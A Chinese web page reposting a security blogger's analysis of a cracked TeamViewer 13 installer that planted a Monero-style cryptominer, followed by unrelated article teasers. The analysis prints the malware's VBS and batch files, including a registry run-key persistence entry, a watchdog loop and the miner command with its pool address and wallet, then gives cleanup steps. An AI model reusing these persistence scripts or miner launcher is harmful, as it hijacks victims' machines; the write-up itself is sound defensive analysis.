当前位置:首页 > 问答百科 > 正文内容

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)

福瑞号2023-05-12 19:26:27问答百科174

不提供TeamViewer激活码分享,建议使用官方免费版或购买正版授权。安装教程步骤详见网站提供的教程。



你下载的TeamViewer13破解版可能有毒

0×0故事背景

最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。

0×1安装过程

先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图1

安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图2

0×2问题排查

开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图3

直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图4

0.Servicecrsssr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"%windir%winvprse.bat",0SetWShell=Nothing

1.Winprs.bat:

@EchoOffREGADDHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer un/v"Chrome"/f/tREG_SZ/d"%windir%servicecrsssr.vbs"Exit

2.Winvpr.vbs:

imWShellSetWShell=CreateObject("WScript.Shell")WShell.Run"winprs.bat",0SetWShell=Nothing

3.Winvprse.bat:

@echooffSETLOCALEnableExtensions:starttimeout/t160/nobreakgt;NULechoofftasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="0"gotostarttasklist/FI"IMAGENAMEeqwmipvrse.exe"2gt;NUL|find/I/N"wmipvrse.exe"gt;NULif"%ERRORLEVEL%"=="1"gotoprocessnotrunning:processnotrunningstart"""%windir%xdgaudio.vbs"gotostartexit

4.xdgaudio.vbs

DimWShell

SetWShell=CreateObject("WScript.Shell")WShell.Run"wmipvrse.exe--cpu-priority2--cpu-affinity2-acryptonight-ostratum+tcp://krb.crypto-coins.club:5555-uKjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ-px",0

SetWShell=Nothing

5.Wmipvrse.exe

矿池与钱包都这么出来了,看看到底挖了多少钱。

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图5

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图6

0×3逆向分析

对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。

CPU-minergithub上面的开源代码

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图7

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图8

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图9

0×4病毒清理

事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。

Step1:使用PCHunter删除6个病毒母体

servicecrsssr.vbs

Winprs.bat

Winvpr.vbs

Winvprse.bat

Wmipvrse.exe

xdgaudio.vbs

Step2:清除注册表

teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)-图10

0×5总结

1.下载软件尽量选择官方平台或者可信的第三方软件平台。

2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。

3.安全无小事,日常需注意。

*本文作者:si1ence,转载自FreeBuf.COM

扫描二维码推送至手机访问。

版权声明:本文由福瑞号发布,如需转载请注明出处。

本文链接:https://www.furui.com.cn/174981.html

“teamviewer激活码分享(TeamViewer13有没有绿色免费版的软件,是否能分享一下)” 的相关文章

EDA是什么(顶点财经:EDA是什么)

EDA是什么(顶点财经:EDA是什么)

什么是EDA?EDA(ElectronicDesignAutomation,电子设计自动化):是指利用计算机软件完成大规模集成电路设计、仿真、验证等流程的设计方式。EDA软件是集成电路领域的上游基础工具,贯穿于集成电路设计、制造、封测等环节,是集成电路产业的战略基础支柱之一。顶点财经:国产替代趋势势...

七擒七纵的主人公是谁(小学必知的60个成语故事及其主人公)

七擒七纵的主人公是谁(小学必知的60个成语故事及其主人公)

成语是中华民族优秀文化的一部分,不仅见证了五千年汉语文化的发展变化,更承载了华夏民族的文化精髓。日常生活中,我们总会用到成语,甚至可以说,每天都离不开成语,因而,认识成语,学习成语,并能正确运用成语,也成了每个中国孩子的必修课。 小编总结了60个小学必知的成语故事和主人公,希望孩子们能够通过这些成语...

家主是什么意思(女公子是什么意思)

家主是什么意思(女公子是什么意思)

星汉灿烂·月升沧海影视剧中,程少商在未出嫁前,一直被称为“女公子”。 比如面对祖母和婶娘的虐待欺凌,身边的婢女在家主面前勇于直言:“家主救命,女公子发热不退,被他们丢到庄子上自生自灭”。那么女公子到底是什么意思?是哪个朝代的称呼? 首先我们来分析字面意思。 女,是女性,与“男”相对。古代以未婚的...

描写风景名胜的成语(关于生活环境、风景名胜的成语)

描写风景名胜的成语(关于生活环境、风景名胜的成语)

关于生活环境的成语: 含有数字: 一尘不染 五光十色 万人空巷 万象更新 书声琅琅(ABCC) 蒸蒸日上 欣欣向荣(AABC) 日新月异 车辆如梭 金碧辉煌 人间天堂 欢声笑语 碧水青山 歌舞升平 窗明几净 山清水秀 锦绣山河 鸟语花香 荒无人烟...

巧克力棒什么意思网络用语(巧克力千年前吃起来像羊屎)

巧克力棒什么意思网络用语(巧克力千年前吃起来像羊屎)

巧克力的历史突显了混合、企业的发明、互益的交流、扩大规模的生产,以及巧妙的包装,如何能够产制更富吸引力、也更让人负担得起的产品。虽然整个过程充满了各种出色的人物,但故事的起点却是个不出色的事实:巧克力很苦。事实上,简直苦到不行,据说荷兰与英国的私掠船员,曾把被劫船只上载运的可可豆丢弃,骂说这些豆子尝...